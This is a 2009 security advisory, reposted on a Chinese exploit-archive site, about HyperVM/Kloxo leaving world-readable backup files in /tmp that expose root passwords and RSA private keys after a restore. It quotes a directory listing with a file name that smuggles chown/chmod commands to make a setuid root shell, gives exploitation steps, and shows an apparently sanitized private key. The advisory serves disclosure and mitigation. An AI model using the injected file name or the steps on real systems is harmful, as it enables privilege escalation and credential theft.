首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HyperVM File Permissions Local Vulnerability
来源:XiaShing[at]gmail.com 作者:XiaShing 发布时间:2009-08-26  

HyperVM is a virtualization application that runs off a host node and can provide
several Virtual Private Servers. There is a previously unreported vulnerability in
HyperVM/Kloxo.

It was originally documented in ISSUE 14 by an anonymous author:
http://www.milw0rm.com/exploits/8880

It turns out that he was showing how a root shell can be created:

 [user1@testing574 tmp]$ ls -al
 total 28
 drwxrwxrwt  4 root  root  4096 May 21 08:41 .
 drwxr-xr-x 24 root  root  4096 May 19 16:57 ..
 -rw-rw-r--  1 user1 user1    0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell;
 drwx------  2 root  root  4096 May 21 08:41 backupPdUzR4
 -rwsr-xr-x  1 root  root  5056 May 21 08:41 shell
 -rw-rw-r--  1 user1 user1   89 May 21 08:33 shell.c

This is pointless, because after a 'restore from backup' in HyperVM, it creates that folder
"backupPdUzR4"

Let's take a look at it...On a VM I tested, even the directory was readable.
$ ls -lha /tmp/backupfileIy00MO/
total 36K
drwxr-xr-x 2 root root 4.0K Dec 12 02:18 .
drwxr-xr-x 3 root root 4.0K Dec 12 10:37 ..
-rw-r--r-- 1 root root  15K Dec 12 00:46 hypervm.file
-rw-r--r-- 1 root root  11K Dec 12 00:46 hypervm.metadata

World readable files. In it, root passwords in plain text. Including username, RSA private keys and lots more.

Here the VM type is shown, it appears to be OpenVZ:
$ cat hypervm.file
al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__op
envz";

--snip--
Private keys!
"hostname";s:8:"fakevps";s:12:"use
rname";s:10:"fakeusername";s:16:"text_private_key";s:887:"-----BEGIN RSA PRIVATE KEY-----
FIICXZIBAAKBgQDdehG9ScmFWL3AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9
dJ/gI+NoY1ygic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQC
Lf17blSAQAXPi84Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY8QpSewoVQIDAQAB
AoGBAKVT7E4a+L38AmoHlWa4KGfCx5hqHC0ZODzQkGG+3HUn0hjyrUlzd6z/3VAd
bBXDCUYf82XMY3h0bOElKPwvHw3+sgUyceSBONLa9pi+He/6ljwR0/LG6XjctdLH
RwVNTEXY/JS15VRKyyXMdohhVbIXa3NjbMqvIBEJPmnjVlWBAkEA90xPi9te3HYj
54uH7/+cEuZ9TlLyeB9+MQ0t7MfqNY1v2PRK+h4J6y4N+v43o9kkN7RGR3zd5Bww
qP/TEfBL8QJBAOVFKGMwkY/2dhqKjnHC2rkN8B5Hn8Px2quf7SXn2tgnuZRYOxah
WAtzdZSt64Vsaz+3fh6tIZ6YYQo/BYJMlqUCQD/UpIWPmZrCqJgVLn/n9kvu0xSh
V1ZpkvNo2p1RMwamP+S7lIujq53aYuOUM5sKGM6ErMwR0VrtaCaI/N2ZspECQBZn
P58Rq+epabkGOQ0cwUq79e6/iPkYtQl4QzAlC9kRF61LQdrgQT49NgwlQpJzGbfM
TmLFADgDI9hgeCVXXpECQQC0c5owQrCx38xtZp6dydAccnHo4jrC83lRL6Epxueo
i+3UYzuVxCQkBdhoF/5nsXv5Qh914MHGnH12qepPokyjd
-----END RSA PRIVATE KEY-----
";s:15:"text_public_key";s:1188:"-----BEGIN CERTIFICATE-----
BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh
YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw
CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A
bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR
BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG
Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN
AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg
ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP
i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G
A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy
d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG
A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx
DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C
AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk
HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1
LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b
uR24why0WWPNsyJU3adesPo4eQf==
-----END CERTIFICATE-----

--snip--
Root passwords!
sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s

So in summary, here are the exploitation steps:
1. Log into HyperVM/Kloxo
2. Click "Backup Home"
3. In the field labeled "Restore from file", browse for any restore file from the popup box.
4. Wait till the VM has finished restoring from backup.
5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network interface, you win.

Mitigation:
After the VM is restarted, manually delete these files as the root user before anyone else reads them.

Regards,
Xia Shing Zee
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ProShow Producer / Gold 4.0.25
·Mozilla Firefox 3.0.5 location
·Lotus note connector for Black
·WM Downloader (.Smi/ .Ram/ .pl
·Novell Client for Windows 2000
·EesySec Personal Firewall Remo
·Cerberus FTP 3.0.1 (ALLO) Remo
·Linux Kernel <= 2.6.30 atalk_g
·Xerox WorkCentre Multiple Mode
·linux/x86 Polymorphic shellcod
·Linux Kernel <= 2.6.31-rc7 AF_
·TFTPUtil GUI 1.3.0 Remote Deni
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved